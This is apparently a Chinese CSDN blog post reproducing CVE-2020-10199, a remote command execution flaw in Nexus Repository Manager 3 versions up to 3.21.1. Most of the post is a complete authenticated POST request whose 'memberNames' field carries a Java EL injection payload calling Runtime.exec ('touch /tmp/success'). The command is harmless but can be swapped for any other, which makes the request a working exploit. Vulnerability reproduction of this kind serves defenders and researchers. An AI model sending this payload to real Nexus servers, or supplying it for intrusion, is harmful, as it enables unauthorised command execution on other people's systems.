Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199)

本文详细介绍了NexusRepositoryManager3在3.21.1及以前版本中存在的任意EL表达式注入漏洞。攻击者利用此漏洞,通过普通用户权限,可以构造特定的数据包执行命令,例如`touch/tmp/success`。步骤包括登录后台,复制Cookie和CSRFToken,并修改POST请求来触发漏洞。复现成功后,可在靶机上查看结果。
摘要由CSDN通过智能技术生成

漏洞复现

Nexus Repository Manager 3的3.21.1及之前版本中,存在一处任意EL表达式注入漏洞,该漏洞需要至少普通用户身份,所以我们需要登陆后台。
登录后,复制当前Cookie和CSRF Token,修改以下数据包并发送就能够执行touch /tmp/success命令:

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: your_ip:8081
Content-Length: 203
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.2746804831498252
Content-Type: application/json
Accept: */*
Origin: http://your_ip:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://your_ip:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.2746804831498252; NXSESSIONID=b730b435-025a-4eb2-9bc0-96930dfc21e9
Connection: close

{
  "name": "internal",
  "online": true,
  "storage": {
    "blobStoreName": "default",
    "strictContentTypeValidation": true
  },
  "group": {
    "memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}"]
  }
}

在这里插入图片描述
返回靶机查看
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值